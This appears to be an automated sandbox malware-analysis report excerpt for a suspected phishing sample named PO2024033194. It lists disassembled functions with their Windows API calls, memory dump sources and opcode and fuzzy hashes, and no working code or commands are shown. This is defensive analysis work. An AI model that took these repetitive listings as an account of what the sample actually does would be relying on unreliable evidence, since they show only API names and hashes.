                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$InputSend
                                                                  • String ID:
                                                                  • API String ID: 2221674350-0
                                                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                  Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$_wcscat
                                                                  • String ID:
                                                                  • API String ID: 2037614760-0
                                                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                  Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                  • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                                                  • String ID:
                                                                  • API String ID: 960795272-0
                                                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                  Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                  • String ID:
                                                                  • API String ID: 4189319755-0
                                                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                  Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow$InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 1976402638-0
                                                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                  Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                  Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$ClearErrorLast
                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                  • API String ID: 2487901850-572801152
                                                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                  Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Enable$Show$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 1871949834-0
                                                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                  Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                  Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                  • SendMessageW.USER32 ref: 00471AE3
                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                  • String ID:
                                                                  • API String ID: 3611059338-0
                                                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                  Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyWindow$DeleteObject$IconMove
                                                                  • String ID:
                                                                  • API String ID: 1640429340-0
                                                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                  Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • _wcslen.LIBCMT ref: 004438CD
                                                                  • _wcslen.LIBCMT ref: 004438E6
                                                                  • _wcstok.LIBCMT ref: 004438F8
                                                                  • _wcslen.LIBCMT ref: 0044390C
                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                  • _wcstok.LIBCMT ref: 00443931
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 3632110297-0
                                                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                  Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                  • String ID:
                                                                  • API String ID: 752480666-0
                                                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                  Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                  • String ID:
                                                                  • API String ID: 3275902921-0
                                                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                  Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                  • String ID:
                                                                  • API String ID: 3275902921-0
                                                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
